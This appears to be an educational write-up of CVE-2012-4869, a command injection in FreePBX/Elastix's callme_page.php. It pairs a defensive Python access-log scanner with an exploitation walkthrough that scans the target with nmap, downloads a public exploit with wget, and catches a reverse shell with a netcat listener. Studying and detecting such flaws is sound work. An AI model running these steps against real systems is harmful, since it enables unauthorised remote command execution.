Disclaimer
The following content is strictly for educational purposes. Please do not attempt exploitation of this vulnerability on any assets without the owner's consent.
References and Links
- https://nvd.nist.gov/vuln/detail/CVE-2012-4869
- https://www.exploit-db.com/exploits/18650
- https://raw.githubusercontent.com/infosecjunky/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution/master/exploit.py
Description
The callme_startcall function in recordings/misc/callme_page.php in FreePBX 2.9, 2.10, and earlier allows remote attackers to execute arbitrary commands via the callmenum parameter in a "c" action.
CWE
CWE-94 – Improper Control of Generation of Code (‘Code Injection’)
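From the defender's side, the vulnerability described above leaves a simple trace in the web server's access log: a request to recordings/misc/callme_page.php with action=c whose callmenum is not a plain dial string. The following Python script, added here as an example and not part of the original write-up or the referenced exploit code, scans Apache combined-format log lines for that pattern. The log lines are constructed, and the dial-string character set [0-9*#+] is an assumption about what legitimate callmenum values look like on a given deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/httpd "combined" access-log format (the sample lines below are constructed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Assumption: a legitimate callmenum is a dial string made of digits and DTMF/plus characters.
DIAL_STRING_RE = re.compile(r'^[0-9*#+]+$')

# Vulnerable endpoint named in the CVE description.
VULN_PATH = 'recordings/misc/callme_page.php'


def inspect_request(url):
    """Return a reason string if the request looks like a probe of CVE-2012-4869,
    otherwise None. Only requests to callme_page.php with action=c are examined."""
    parts = urlsplit(url)
    if not parts.path.endswith(VULN_PATH):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get('action', [None])[0] != 'c':
        return None
    callmenum = params.get('callmenum', [''])[0]
    # parse_qs already percent-decodes once; decode again to see through double encoding.
    decoded = unquote(callmenum)
    if not decoded:
        return 'callmenum missing or empty in c action'
    if not DIAL_STRING_RE.match(decoded):
        return 'callmenum contains non-dial-string characters: %r' % decoded
    return None


def scan_log(lines):
    """Return a list of (client_ip, timestamp, reason) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reason = inspect_request(m.group('url'))
        if reason:
            findings.append((m.group('ip'), m.group('ts'), reason))
    return findings


# Constructed sample log lines for demonstration.
SAMPLE_LOG = [
    # benign: a user placing a normal call-me request
    '10.0.0.5 - - [03/Mar/2013:10:01:02 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=2001 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # benign: a different action on the same page
    '10.0.0.5 - - [03/Mar/2013:10:01:05 +0000] "GET /recordings/misc/callme_page.php?action=d HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    # suspicious: callmenum carries characters no dial string should contain
    '198.51.100.7 - - [03/Mar/2013:10:02:00 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=2001%3Bxyz HTTP/1.1" 200 512 "-" "python-requests/1.2"',
    # unrelated page
    '10.0.0.9 - - [03/Mar/2013:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, ts, reason in scan_log(SAMPLE_LOG):
        print(ip, ts, reason)
```

Pointed at a real access log (one line per list element), the script is a quick retrospective hunt for attempts against this endpoint; because parse_qs decodes the query string before the check, percent-encoded control characters are caught the same as literal ones. Any hit is worth correlating with the Asterisk side, since the injected input is ultimately acted on by the PBX rather than by the web server.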
Exploitation Walkthrough
This section demonstrates the exploitation of this vulnerability.
1. Enumeration
First, we perform an Nmap port scan to determine open ports, service versions and other useful information such as the operating system.
nmap -sS -p- -Pn -A -T4 -vv 10.xx.xx.x -oN 10.xx.xx.x.nmap
The following results indicate the presence of an Elastix 2.2.0 web server.
| Open Port | Service | Version       |
| 443       | https   | Elastix 2.2.0 |
2. Exploitation
For this walkthrough I will use the exploit code published by infosecjunky.
The following command downloads the exploit script to your local system.
wget https://raw.githubusercontent.com/infosecjunky/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution/master/exploit.py
Next, we modify the rhost, lhost and lport variables in the exploit. rhost is the target IP; lhost and lport are your IP and the port you will listen on.
Next, we set up a listener to catch the reverse shell connection.
nc -lvnp 4444
Lastly, we run the following command to execute the exploit against the target (the file downloaded above is exploit.py).
python3 exploit.py